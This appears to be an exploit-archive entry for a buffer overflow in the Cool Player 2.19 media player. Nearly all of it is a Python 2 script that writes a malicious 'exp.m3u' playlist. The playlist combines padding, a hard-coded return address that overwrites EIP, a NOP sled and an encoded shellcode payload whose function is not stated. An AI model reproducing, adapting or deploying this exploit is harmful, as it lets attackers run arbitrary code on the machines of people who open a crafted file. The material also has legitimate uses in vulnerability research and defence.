Cool player 2.19 Buffer Overflow Exploit

2015-09-02
ID: 23803
CVE: None
Download vulnerable application: None
#
# AJITH KP (@ajithkp560)
# Cool player 2.19 Buffer Overflow
#
#
# Video: https://www.youtube.com/watch?v=LobRjDom_3w&feature=youtu.be
 junk = b'A' * 253
eip = b'\x53\x93\x42\x7E'
nops = '\x90' * 5
buf = ("\xb8\x20\x65\x02\x44\xdb\xc2\xd9\x74\x24\xf4\x5a\x33\xc9"+
"\xb1\x32\x31\x42\x12\x03\x42\x12\x83\xca\x99\xe0\xb1\xf6"+
"\x8a\x6c\x39\x06\x4b\x0f\xb3\xe3\x7a\x1d\xa7\x60\x2e\x91"+
"\xa3\x24\xc3\x5a\xe1\xdc\x50\x2e\x2e\xd3\xd1\x85\x08\xda"+
"\xe2\x2b\x95\xb0\x21\x2d\x69\xca\x75\x8d\x50\x05\x88\xcc"+
"\x95\x7b\x63\x9c\x4e\xf0\xd6\x31\xfa\x44\xeb\x30\x2c\xc3"+
"\x53\x4b\x49\x13\x27\xe1\x50\x43\x98\x7e\x1a\x7b\x92\xd9"+
"\xbb\x7a\x77\x3a\x87\x35\xfc\x89\x73\xc4\xd4\xc3\x7c\xf7"+
"\x18\x8f\x42\x38\x95\xd1\x83\xfe\x46\xa4\xff\xfd\xfb\xbf"+
"\x3b\x7c\x20\x35\xde\x26\xa3\xed\x3a\xd7\x60\x6b\xc8\xdb"+
"\xcd\xff\x96\xff\xd0\x2c\xad\xfb\x59\xd3\x62\x8a\x1a\xf0"+
"\xa6\xd7\xf9\x99\xff\xbd\xac\xa6\xe0\x19\x10\x03\x6a\x8b"+
"\x45\x35\x31\xc1\x98\xb7\x4f\xac\x9b\xc7\x4f\x9e\xf3\xf6"+
"\xc4\x71\x83\x06\x0f\x36\x7b\x4d\x12\x1e\x14\x08\xc6\x23"+
"\x79\xab\x3c\x67\x84\x28\xb5\x17\x73\x30\xbc\x12\x3f\xf6"+
"\x2c\x6e\x50\x93\x52\xdd\x51\xb6\x30\x80\xc1\x5a\xb7")
nops = b'\x90' * 5
code = junk + eip + '\x90'*25 + buf
print len(code)
f = open("exp.m3u", "w")
f.write(code)
f.close()
print "Done :)"
1-4-2 (www01)